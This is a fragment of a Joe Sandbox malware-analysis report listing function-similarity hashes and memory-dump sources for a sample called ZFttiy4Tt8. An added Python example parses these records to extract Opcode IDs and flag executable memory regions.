                                                              • Opcode ID: 544dde2e1b5c7ab8e08655f92d39a76c91b99a41669ad29a70e2bff7df53d63e
                                                              • Instruction ID: 33f2309fe5538f4ec63cc9aeed905e4f4fb4eb0bea19a2b71c50acd10cb96572
                                                              • Opcode Fuzzy Hash: 544dde2e1b5c7ab8e08655f92d39a76c91b99a41669ad29a70e2bff7df53d63e
                                                              • Instruction Fuzzy Hash: FA12C776F483154FC30CED6DC992359FAD757C8310F1A893EA999DB3A0EAB9EC014681
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58b3cd3d1e135f7a829a595f2b1fa7f303706507dcc4e59cb83b1ad62483f620
                                                              • Instruction ID: d711098401f50167633487fffa23d97dd83ac20b1ee6a684e59a4cc1acd2eb9f
                                                              • Opcode Fuzzy Hash: 58b3cd3d1e135f7a829a595f2b1fa7f303706507dcc4e59cb83b1ad62483f620
                                                              • Instruction Fuzzy Hash: 1CE1143090831D8BD324CF08C54037AB7E3AF86354F2AC52DD6D98B395D774D9969BA2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b2be40a3a215de37bef8bd5402ab9c83e72e5633a366b374f1a9c54e1442850
                                                              • Instruction ID: 3b301ba9977854c21ba7f4ce01d7b27f9dacb818a37de9485a384e9e9edd14c7
                                                              • Opcode Fuzzy Hash: 4b2be40a3a215de37bef8bd5402ab9c83e72e5633a366b374f1a9c54e1442850
                                                              • Instruction Fuzzy Hash: FEC19F75604B018FD328CF29C490B66B7E1FF86714F148A2DE5EA87B91D734E846CB51
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0aaffa1a3eb2fb50584a19a56f7adaa2270aa0f95ba39520d1fb2f7be032dc1d
                                                              • Instruction ID: bbd162dee2b12fbe8a919eae1593a291d6903a597b022de8461a052a059c38a1
                                                              • Opcode Fuzzy Hash: 0aaffa1a3eb2fb50584a19a56f7adaa2270aa0f95ba39520d1fb2f7be032dc1d
                                                              • Instruction Fuzzy Hash: BEC16EB16296218BD32DDF19C490665FBE1FF81B14F19866DD5BA8F782C734E881CB80
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                                              • Instruction ID: d9e0764fe2c326db619fb8c61011fb51581b708606c99319dde30dc1a3f793ca
                                                              • Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                                              • Instruction Fuzzy Hash: E2A115716083118FC728CF2CC580B2AB7E6BFC5314F19962EE5A5A7391E736DC468B81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                              • Instruction ID: 021e3951b98a11d8df07747ba6f257a40de85fe2bfade1c5f9566a3c91fc5fa2
                                                              • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                              • Instruction Fuzzy Hash: 6DA18335A041598FEB38DE29CC81FDA73E2EF89314F1A8565DD59AF3D0EA30AD458780
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 822f236f8a031898cf9c05a63dbb08ad7e60d914b33a6238f3507f02059f2681
                                                              • Instruction ID: fae9c8ce60d6a803e6a54ad7f249a4bdb45b1457a85736271efd02bffc3f91af
                                                              • Opcode Fuzzy Hash: 822f236f8a031898cf9c05a63dbb08ad7e60d914b33a6238f3507f02059f2681
                                                              • Instruction Fuzzy Hash: 15C1D871918B419BD322CF38C841BEBB7E1BFD9304F209A1DE5EAA6251EB707584CB51
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 469f5feaa6cdedb1c767ef452aa8e574ec6ed0cbb722bef60b763b068e33743a
                                                              • Instruction ID: 4afff94d27f8fb272a6bba3c9da438d82d34ea939e2f3f81cdd69c52f10d9fc1
                                                              • Opcode Fuzzy Hash: 469f5feaa6cdedb1c767ef452aa8e574ec6ed0cbb722bef60b763b068e33743a
                                                              • Instruction Fuzzy Hash: 3C712F3224C1644BEB5F492C889037DABF74BC7120F5E4A2AE5E9C7786DB35D8428393
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5779c6490853fd06ae00aae64ebd5bf68b8b3e30a3e440a2c0493a244e4979be
                                                              • Instruction ID: bd66ee0d9f8c9576dcd8fa1af604f163e58acce2811f55b27b1d962f1acf2f4f
                                                              • Opcode Fuzzy Hash: 5779c6490853fd06ae00aae64ebd5bf68b8b3e30a3e440a2c0493a244e4979be
                                                              • Instruction Fuzzy Hash: E381B161D0D78556E6219B359B02BEBB3E4AFE9304F099B28BD8C91113FB30B9D49312
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d0a10367097a6f60f31a8e32d8671e876cd9a5bd9d801b9d8ae16c46d84072ab
                                                              • Instruction ID: 435c3e16163f53ad4a25b70e49c8a97e5b1d6633c49b2e07a214c46514fa7cd5
                                                              • Opcode Fuzzy Hash: d0a10367097a6f60f31a8e32d8671e876cd9a5bd9d801b9d8ae16c46d84072ab
                                                              • Instruction Fuzzy Hash: 51711832A08719CBC7189F18C89072BB7E2FF89328F59872DD9944B395D335E955CB82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bffddab4c92942521cf219c1e70bb83b5db4f87e49b169d6180ea4261426b0b
                                                              • Instruction ID: 75cd4efffae259320087cc280a0f62a69f1393cefc5570e8eaad7b4ea74122dc
                                                              • Opcode Fuzzy Hash: 2bffddab4c92942521cf219c1e70bb83b5db4f87e49b169d6180ea4261426b0b
                                                              • Instruction Fuzzy Hash: 60811872D18B82CBD7198F68D8906B6BBA0FFDA214F14471EEDE606783E7749181C781
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8fd8190514bf927e9cbd77d683dc24b800d19774b9aad3968af05b6e24ac7093
                                                              • Instruction ID: add37639047445a2bbca2256af7f7f62e8803db144ac64abf698fc71decb529b
                                                              • Opcode Fuzzy Hash: 8fd8190514bf927e9cbd77d683dc24b800d19774b9aad3968af05b6e24ac7093
                                                              • Instruction Fuzzy Hash: 3581E8B2D14B82CBD3198F68C8906B6B7A0FFDA314F549B1EEDE606742E7749580C781
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22e24cba6975df47767ecf5258f7d3e8c5d8b7c329995e3af1acc1efdb3c9f53
                                                              • Instruction ID: 598c7a128390771ee8023290efb4cdc2d352c9d42844f6120e0ff3508280e809
                                                              • Opcode Fuzzy Hash: 22e24cba6975df47767ecf5258f7d3e8c5d8b7c329995e3af1acc1efdb3c9f53
                                                              • Instruction Fuzzy Hash: C6618F72D187808BE3158F28C8802A97BAAFFC6314F29836DECE95B357D7759941C741
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb854b4e77a39a5efab709037a8b214b2836d2b5f7a1c853e4299284668f37c3
                                                              • Instruction ID: 6de1935ed1732226e82056fff05c5987c7c3e84aa3c3639d3a1c79f317034668
                                                              • Opcode Fuzzy Hash: bb854b4e77a39a5efab709037a8b214b2836d2b5f7a1c853e4299284668f37c3
                                                              • Instruction Fuzzy Hash: E041E177F216280BE35898699C6626A72C297C4320F4A463DDAA6C73C6EC74DD1693C0
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
• Instruction ID: 43f732f70f11d2a51e2cdf4606b6d9251787fc9aea1cdbbfad516ce4bdc33793
• Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
• Instruction Fuzzy Hash: E031C6313083194BD719AD6DE4D022EF6E39FC8260F5D8A3CE585C3381EB718C488681
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
• Instruction ID: 4b61e2d3ee204c842d09fa8b2da42d517f3c89ecf7eef5428cfa9708416907ca
• Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
• Instruction Fuzzy Hash: 9BF0C233B716394BA3A0CDBA6C001E7A2C3A3C4270F5F89A5DC84D7542E934CC4686C6
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
• Instruction ID: 0ebce148fd7b662af54655eacc33d1446fc5777d8d644be38c7256ec656c49c0
• Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
• Instruction Fuzzy Hash: 79F08C33B20A344B6360CC7A8D05197A2C797C86B0B0FC969ECA0E7206E930EC0656D1
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e4426a6f4703e13c1afe4e9b55a6e5503ee40af78ca4f5441ae224427c4b68c
• Instruction ID: 54a8f0b96a27819acf4404a16d798759613ff8a97c0cfd67cdeb9a9257d48d5a
• Opcode Fuzzy Hash: 0e4426a6f4703e13c1afe4e9b55a6e5503ee40af78ca4f5441ae224427c4b68c
• Instruction Fuzzy Hash: 60B012319002004F5716C934D87109133B373D130135AD4E9D00345115DA35D0028701
Strings
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
Similarity
• API ID:
• String ID: [
• API String ID: 0-784033777
• Opcode ID: 7b3b1a848510845598291eaa8efe56c95e8486a3e14809612535b487cebfe804
• Instruction ID: d47bcf4ff6091e5d37845c65a2b3ab535e534191535a6620c0c46c092259f373
• Opcode Fuzzy Hash: 7b3b1a848510845598291eaa8efe56c95e8486a3e14809612535b487cebfe804
• Instruction Fuzzy Hash: 68B158716083815BDB798A24C89077ABBD8EB5530FF982D2DECC6E7181EB35C94C8752
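The records above are machine-generated and the report gives no help in reading them. What a practitioner usually wants from this part of a report is two things: the per-function Opcode IDs as exact keys to pivot on across other reports, and a quick view of which memory dumps were taken from executable, writable regions (where unpacked code ends up). The following Python is an added example for this page; it is not Joe Sandbox code and the sandbox exposes no such interface. It decodes only two fields of the .sdmp names, on the assumption that the fourth dot-separated field is the region base address and the fifth a winnt.h PAGE_* protection value (the values seen on this page, 0x04, 0x40 and 0x80, fit that reading); the remaining fields are not documented here and are left alone. The sample input is a constructed, abridged copy of two of the records shown above.

```python
"""Parse Joe Sandbox "Memory Dump Source"/"Similarity" records (added example,
not Joe Sandbox code). ASSUMPTION: in the .sdmp names the 4th dot-separated
field is the region base address and the 5th a winnt.h PAGE_* value; the
remaining fields are not documented on the page and are left undecoded."""
import re
from dataclasses import dataclass, field

# winnt.h memory-protection constants (these values are certain).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any PAGE_EXECUTE* value

# Constructed sample: two records abridged from the report text above.
SAMPLE = """\
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
• Instruction ID: 43f732f70f11d2a51e2cdf4606b6d9251787fc9aea1cdbbfad516ce4bdc33793
• Instruction Fuzzy Hash: E031C6313083194BD719AD6DE4D022EF6E39FC8260F5D8A3CE585C3381EB718C488681
Strings
Memory Dump Source
• Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
Similarity
• String ID: [
• API String ID: 0-784033777
• Opcode ID: 7b3b1a848510845598291eaa8efe56c95e8486a3e14809612535b487cebfe804
• Instruction ID: d47bcf4ff6091e5d37845c65a2b3ab535e534191535a6620c0c46c092259f373
"""


@dataclass
class Record:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    associated: list = field(default_factory=list)
    attrs: dict = field(default_factory=dict)  # Opcode ID, Instruction ID, ...


BULLET = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")


def decode_dump_name(name):
    """Return base address and protection of an .sdmp name (assumed layout)."""
    parts = name.removesuffix(".sdmp").split(".")
    if len(parts) < 5:
        raise ValueError(f"unexpected dump name: {name}")
    prot = int(parts[4], 16)
    return {"base": int(parts[3], 16),
            "protection": PAGE_PROTECTION.get(prot, hex(prot)),
            "executable": bool(prot & EXECUTE_MASK)}


def parse_records(text):
    """One Record per 'Memory Dump Source' header; bullet lines fill it in."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = Record()
            records.append(cur)
            continue
        m = BULLET.match(line)
        if cur is None or not m:
            continue  # section titles such as "Similarity" or "Strings"
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            fname, _, rest = value.partition(",")  # "..., Offset: X, based on PE: Y"
            cur.source_file = fname.strip()
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
            cur.offset = int(off.group(1), 16) if off else 0
            cur.based_on_pe = bool(re.search(r"based on PE:\s*true", rest))
        elif key == "Associated":
            cur.associated.append(value)
        else:
            cur.attrs[key] = value
    return records


def hunting_hashes(records):
    """Unique Opcode IDs: exact per-function keys to pivot on across reports."""
    return sorted({r.attrs["Opcode ID"] for r in records if r.attrs.get("Opcode ID")})


def executable_dump_names(records):
    """Dumps taken from executable memory, where unpacked code would live."""
    names = {n for r in records for n in [r.source_file, *r.associated]
             if n and decode_dump_name(n)["executable"]}
    return sorted(names)


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        src = decode_dump_name(r.source_file)
        print(f"{r.source_file}: base={src['base']:#x} {src['protection']} "
              f"offset={r.offset:#x} opcode_id={r.attrs.get('Opcode ID')}")
```

Run on the sample, the source dump at base 0xDF1000 decodes as PAGE_EXECUTE_READWRITE while the associated dump at 0xDF0000 (the report's Offset, i.e. the image base holding the PE header) is PAGE_READWRITE; a writable and executable image region is worth opening first in any report, since that is where in-place unpacked code lives. The Opcode ID and Instruction ID values are 64 hex characters and are treated as exact keys; the "Fuzzy Hash" values use the IDA plugin's own format, so the example keeps them as opaque strings rather than comparing them with ssdeep or similar tools.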